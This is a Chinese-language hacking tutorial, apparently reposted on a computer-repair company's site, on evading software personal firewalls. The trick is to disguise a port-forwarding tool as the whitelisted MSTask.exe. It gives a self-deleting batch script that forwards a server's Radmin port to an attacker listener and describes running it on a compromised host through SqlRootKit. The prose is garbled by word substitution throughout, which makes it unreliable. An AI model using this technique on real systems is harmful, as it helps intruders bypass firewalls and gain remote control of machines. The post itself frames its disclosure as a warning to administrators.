一气通杀　国内软件防火墙的弱点-故障诊断-福州电脑维修|上门维修维护|包年电脑维修|IT外包

一气通杀　国内软件防火墙的弱点

不停以来都有一个梦想：要是能发明些毛病或BUG什么的该多好啊！于是整天对着电脑瞎弄瞎研讨，研讨什么呢？研讨怎样打破防火墙（偶这里指的防火墙是软体型的小我私家防火墙，硬件的偶也没条件。）嘿嘿，你还别说，还真没白研讨，还真给偶发明了大少数防火墙的通病。这个BUG能让我们诱骗防火墙来达到访外的目的，详细情况是怎样样的呢？请看上面的讲授！
首先，我要先容一下Windows体系特性，当一个步伐运行时，它不克不及删除，但却能够改名！而当体系里的被掩护步伐遭到删除或损坏或改名时体系就会及时调用备份文件赐与复原！我再讲讲防火墙，各人都晓得很多防火墙的“使用步伐规则”里一般默认就会让IE欣赏器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe经过，而大多的防火墙认为只需是与规则里的途径及文件名相同就Pass！以如许的检测要领来决议能否放行，但它却完全没考虑到要是是别的文件更换的呢？——就相当于古装片里的易容术，易容后就认不得了！这就给了我们时机，我们可以使用这个BUG来诱骗防火墙来达到访外的目的！　
小知识：实在如今大多木马采用的DLL插线程技能也便是使用了这个原理，它们首先潜伏的开启一个认证放行的步伐进程（如Iexplore.exe进程），接着把DLL型木马插入这个线程内，然后访外时就可轻松打破防火墙的限制了——由于防火墙是不会阻拦已认证放行的步伐的。　
原理讲完了，我们如今讲讲该怎样使用这个BUG了！这里我用假造机做实验，制造如下条件：　
为了更切合现实，我给服务器安置了“天网防火墙”、Radmin（但由于防火墙指定了拜访IP地点，以是没办法正常连接！），MSSQL SERVER、Serv-u。首先我们用常用的要领进行端口转发，看看防火墙有什么反应！　
第一步，启用AngelShell Ver 1.0里的Fport（用来进行端口转发的服务端，险些可以转发任何端口），然后在当地用FportClient（用来进行端口转发的客户端）监听好！　
第二步，间接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”，这时我们看到假造机里的“天网”对Fport顿时进行了阻拦。　
看到了吧！由于Fport并不是认证放行的，防火墙顿时就进行了阻拦！OK，如今我们实行诱骗计划，看偶怎样打破防火墙的！照旧实行第一步，然后新建一个批处置惩罚，内容如下：　
ren MSTask.exe MSTask1.exe 　
ren fport.exe MSTask.exe 　
MSTask.exe 4899 192.168.1.1 7788 　
Del %0 　
定名为go.bat，接着用SqlRootKit把“Fport.exe”和go.bat 一起copy到目标机子的c:\winnt\system32\（也便是MSTask地点的目次）在SqlRootKit里实行go.bat（细致要是要改MSTask.exe的名的话就必要有管理员权限）。　
当FportClient出现“曾经担当到远程盘算机的连接！”时，用Radmin客户端连接本机的4899端口。　
我们曾经成功打破限制（由于防火墙没有限制当地连接4899端口，我们用Fport转发了它的端口，登录时等于当地连接，因此我们能够成功连接），如许一来，我们本不克不及逃过防火墙的Fport便酿成了一个有“插线程”技能的端口转发东西了！　
据我实验，海内的防火墙险些无一破例的“拥有”这个BUG！虽然这个BUG不会带来什么大的危害，但总是给入侵者多了一个黑我们的时机！　
WTF老大说独乐乐不如众乐乐，以是我照旧颁布出来了，一是可以让我们海内的防火墙有所革新，二是给网管们提个醒！由于小弟技能有限，不免会出现错误，欢迎各位指正批评。